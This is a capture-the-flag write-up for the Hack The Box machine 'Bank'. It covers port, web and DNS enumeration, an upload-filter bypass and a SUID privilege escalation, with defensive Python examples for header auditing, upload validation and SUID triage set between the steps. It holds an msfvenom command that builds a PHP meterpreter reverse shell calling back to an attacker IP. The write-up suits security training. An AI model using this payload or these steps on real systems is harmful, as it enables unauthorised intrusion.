Difficulty Rating:

Machine: Bank
OS: Linux
IP: 10.10.10.29

  • Nmap
$ nmap -A 10.10.10.29

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-28 14:17 IST
Nmap scan report for 10.10.10.29
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|_  256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.91 seconds
  • Nikto
$ nikto -h http://10.10.10.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.29
+ Target Hostname:    10.10.10.29
+ Target Port:        80
+ Start Time:         2017-07-28 09:38:24 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2cf6 0x5509adba7a45d 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7500 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2017-07-28 10:01:54 (GMT5.5) (1410 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
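Nikto's findings above are all response-header hygiene: three protective headers missing and a version-revealing Server banner. The following Python is an added example (not part of this writeup or Nikto's own code) that re-checks those points on a captured header set and pairs each finding with the Apache mod_headers/ServerTokens directive that fixes it. The two header dictionaries are constructed here; the first mirrors what Nikto reported for 10.10.10.29, the second shows the same response after hardening.

```python
"""Audit HTTP response headers for the weaknesses Nikto reported on the Bank box.

Added example, not from the writeup. Input is a dict of response headers;
output is a list of (finding, fix) pairs, where fix is the Apache directive.
"""
from typing import Callable, Dict, List, Tuple

# Headers Nikto flagged as absent, with an acceptable-value check and the
# mod_headers directive a defender adds to the vhost to set them.
EXPECTED_HEADERS: Dict[str, Tuple[Callable[[str], bool], str]] = {
    "X-Frame-Options": (lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
                        'Header always set X-Frame-Options "SAMEORIGIN"'),
    "X-Content-Type-Options": (lambda v: v.strip().lower() == "nosniff",
                               'Header always set X-Content-Type-Options "nosniff"'),
    "X-XSS-Protection": (lambda v: v.strip().startswith("1"),
                         'Header always set X-XSS-Protection "1; mode=block"'),
}

# Constructed sample: what the Bank box's Apache answered with (per the Nikto run).
BANK_RESPONSE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "Content-Type": "text/html",
    "ETag": '"2cf6-5509adba7a45d"',
}

# Constructed sample: the same response after the directives below are applied.
HARDENED_RESPONSE_HEADERS = {
    "Server": "Apache",                # ServerTokens Prod strips the version
    "Content-Type": "text/html",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
}


def audit_headers(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (finding, fix) pairs; header names are matched case-insensitively."""
    lowered = {k.lower(): v for k, v in headers.items()}
    findings: List[Tuple[str, str]] = []
    for name, (value_ok, fix) in EXPECTED_HEADERS.items():
        value = lowered.get(name.lower())
        if value is None:
            findings.append((f"{name} header is missing", fix))
        elif not value_ok(value):
            findings.append((f"{name} has a weak value: {value!r}", fix))
    # A Server banner containing digits is advertising a version string.
    server = lowered.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append((f"Server header leaks version: {server!r}", "ServerTokens Prod"))
    return findings


if __name__ == "__main__":
    for finding, fix in audit_headers(BANK_RESPONSE_HEADERS):
        print(f"[!] {finding:45s} -> {fix}")
    print("hardened response findings:", audit_headers(HARDENED_RESPONSE_HEADERS))
```

X-XSS-Protection is kept only because Nikto reports it; current browsers ignore that header, and a Content-Security-Policy is the control that actually matters for XSS today.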
  • Dirb
$ dirb http://10.10.10.29

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 09:37:58 2017
URL_BASE: http://10.10.10.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612          
---- Scanning URL: http://10.10.10.29/ ----
+ http://10.10.10.29/index.html (CODE:200|SIZE:11510)                                                                         
+ http://10.10.10.29/server-status (CODE:403|SIZE:291)                                                                                 
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 09:51:41 2017
DOWNLOADED: 4612 - FOUND: 2
  • Port 53 is open, so let’s try a zone transfer.
  • After some guessing, I found that the domain bank.htb works.
  • Let’s add it to /etc/hosts.
  • The dig command also shows that bank.htb resolves:
$ dig @10.10.10.29 bank.htb
; <<>> DiG 9.10.3-P4-Debian <<>> @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3082
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;bank.htb.			IN	A

;; ANSWER SECTION:
bank.htb.		604800	IN	A	10.10.10.29

;; AUTHORITY SECTION:
bank.htb.		604800	IN	NS	ns.bank.htb.

;; ADDITIONAL SECTION:
ns.bank.htb.		604800	IN	A	10.10.10.29

;; Query time: 145 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Fri Jul 28 15:28:54 IST 2017
;; MSG SIZE  rcvd: 86
  • Dnsrecon
$ dnsrecon -d bank.htb -n 10.10.10.29
[*] Performing General Enumeration of Domain: bank.htb
[-] DNSSEC is not configured for bank.htb
[*] 	 SOA bank.htb 10.10.10.29
[*] 	 NS ns.bank.htb 10.10.10.29
[*] 	 Bind Version for 10.10.10.29 9.9.5-3ubuntu0.14-Ubuntu
[-] Could not Resolve MX Records for bank.htb
[*] 	 A bank.htb 10.10.10.29
[*] Enumerating SRV Records
[-] No SRV Records Found for bank.htb
[*] 0 Records Found
  • Dnsenum
$ dnsenum --dnsserver 10.10.10.29 bank.htb
dnsenum.pl VERSION:1.2.3

-----   bank.htb   -----


Host's addresses:
__________________

bank.htb.                                604800   IN    A        10.10.10.29


Name Servers:
______________

ns.bank.htb.                             604800   IN    A        10.10.10.29


Mail (MX) Servers:
___________________



Trying Zone Transfers and getting Bind Versions:
_________________________________________________

unresolvable name: ns.bank.htb at /usr/bin/dnsenum line 842.

Trying Zone Transfer for bank.htb on ns.bank.htb ... 
AXFR record query failed: no nameservers

brute force file not specified, bay.
  • Dirb on bank.htb
$ dirb http://bank.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 15:16:16 2017
URL_BASE: http://bank.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bank.htb/ ----
==> DIRECTORY: http://bank.htb/assets/                                                                                                                                                       
==> DIRECTORY: http://bank.htb/inc/                                                                                                                                                          
+ http://bank.htb/index.php (CODE:302|SIZE:7322)                                                                                                                                             
+ http://bank.htb/server-status (CODE:403|SIZE:288)                                                                                                                                          
==> DIRECTORY: http://bank.htb/uploads/                                                                                                                                                      
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/inc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                             
---- Entering directory: http://bank.htb/uploads/ ----
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 15:48:18 2017
DOWNLOADED: 9224 - FOUND: 2

  • Dirb to search for only php pages
$ dirb http://bank.htb -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 16:32:38 2017
URL_BASE: http://bank.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bank.htb/ ----
+ http://bank.htb/index.php (CODE:302|SIZE:7322)
+ http://bank.htb/login.php (CODE:200|SIZE:1974)                                
+ http://bank.htb/logout.php (CODE:302|SIZE:0)                                          
+ http://bank.htb/support.php (CODE:302|SIZE:3291)                            
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 16:50:30 2017
DOWNLOADED: 4612 - FOUND: 4
  • Start Burp suite and intercept requests and responses from 10.10.10.29
  • Go to bank.htb/support.php
  • You’ll get a form from where you can upload a file.
  • Upload a payload with extension “.htb” (Read comments from support.php)

$ msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.15.16 LPORT=4444 > r2.htb
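The support.php upload form accepts a file with a `.htb` extension that the server then executes, so the filter on the page is whatever let that extension through. The upload handler itself is not shown in this writeup; the Python below is an added example (not the box's code) that assumes the common deny-list mistake as the "before" and shows the "after" a defender wants: an extension allow-list, a magic-byte check that the bytes match the claimed type, and a server-chosen storage name. File names and byte strings are constructed for the demonstration.

```python
"""Upload validation: deny-list (weak) beside allow-list plus content check (hardened).

Added example, not from the writeup. The deny-list version is an assumption
about how a .htb file can pass; the box's support.php is not shown.
"""
import os
import secrets
from typing import Tuple

# "Before": blocks a few script extensions and accepts everything else.
DENIED_EXTENSIONS = {".php", ".php3", ".phtml"}


def denylist_check(filename: str) -> bool:
    """Weak filter: returns True (accept) for any extension not on the list."""
    return os.path.splitext(filename)[1].lower() not in DENIED_EXTENSIONS


# "After": only these types are accepted, and each must start with its signature.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def allowlist_check(filename: str, content: bytes) -> Tuple[bool, str]:
    """Hardened filter: (accepted, reason). Name must be bare, type allow-listed,
    and the leading bytes must match the signature for that type."""
    if os.path.basename(filename) != filename or filename.startswith("."):
        return False, "path components or hidden file name"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not in allow-list"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, f"content does not look like {ext}"
    return True, "ok"


def safe_storage_name(ext: str) -> str:
    """Never reuse the client's name: random name, allow-listed extension only."""
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"refusing to store extension {ext!r}")
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample uploads.
    samples = [
        ("r2.htb", b"<?php echo 'constructed'; ?>"),
        ("photo.png", ALLOWED_TYPES[".png"] + b"\x00" * 16),
        ("photo.png", b"<?php echo 'renamed script'; ?>"),
        ("../photo.png", ALLOWED_TYPES[".png"]),
    ]
    for name, data in samples:
        print(f"{name:14s} deny-list={denylist_check(name)!s:5s} "
              f"allow-list={allowlist_check(name, data)}")
```

The storage directory should also sit outside the DocumentRoot, or be served with script handlers disabled, so that even a file that slips through is only ever returned as bytes, never executed.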

  • You get a shell, and from there you can own the user Chris.
  • To own the system, look for SUID binaries:
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount
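Everything in that listing except one entry is a setuid helper shipped by an Ubuntu package; the odd one out sits under /var/htb/bin, which no package installs to. The Python below is an added example (not from the writeup) that turns that eyeballing into a check a defender can run on a `find / -perm -4000 -exec ls -ld` listing: it parses the lines and flags every SUID binary outside the directories package managers use. The sample listing is the one from the box above, embedded as input.

```python
"""Triage a `find / -perm -4000 ... ls -ld` listing for out-of-place SUID binaries.

Added example, not from the writeup. SUID_LISTING is copied from the Bank box
output above; the prefix list is an assumption about Debian/Ubuntu packaging.
"""
import re
from typing import Dict, List, Tuple

SUID_LISTING = """\
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount
"""

# Directories Debian/Ubuntu packages install setuid helpers into (assumption);
# anything elsewhere deserves a second look, then `dpkg -S <path>` to confirm.
PACKAGE_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                    "/usr/lib/", "/usr/libexec/")

# ls -ld line: mode links user group size month day time-or-year path
LINE_RE = re.compile(
    r"^(?P<mode>[-rwxsStT]{10})\s+\d+\s+(?P<user>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$")


def parse_suid_listing(text: str) -> List[Dict[str, str]]:
    """Parse each ls -ld line into a dict; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def triage(entries: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (path, reason) for every SUID binary that warrants investigation."""
    flagged = []
    for e in entries:
        if not e["path"].startswith(PACKAGE_PREFIXES):
            scope = "any user" if e["mode"][9] == "x" else f"group {e['group']} only"
            flagged.append((e["path"],
                            f"outside package directories, runs as {e['user']} for {scope}"))
    return flagged


if __name__ == "__main__":
    found = parse_suid_listing(SUID_LISTING)
    print(f"{len(found)} SUID binaries parsed")
    for path, reason in triage(found):
        print(f"[!] {path}: {reason}")
```

On a real host the next steps are `dpkg -S` on each flagged path to see whether any package owns it and a look at its ctime against the install date; a root-owned, world-executable SUID binary that no package accounts for is exactly the kind of artifact this listing is meant to surface.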
  • /var/htb/bin/emergency looks interesting
$ cd /var/htb/bin/
$ ./emergency /root
$ ./emergency ls
./emergency: 0: Can't open ls
$ ./emergency /root/root.txt
/root/root.txt: 1: /root/root.txt: XXXXXXXXXX: not found
User and Root owned!!

Share the fun!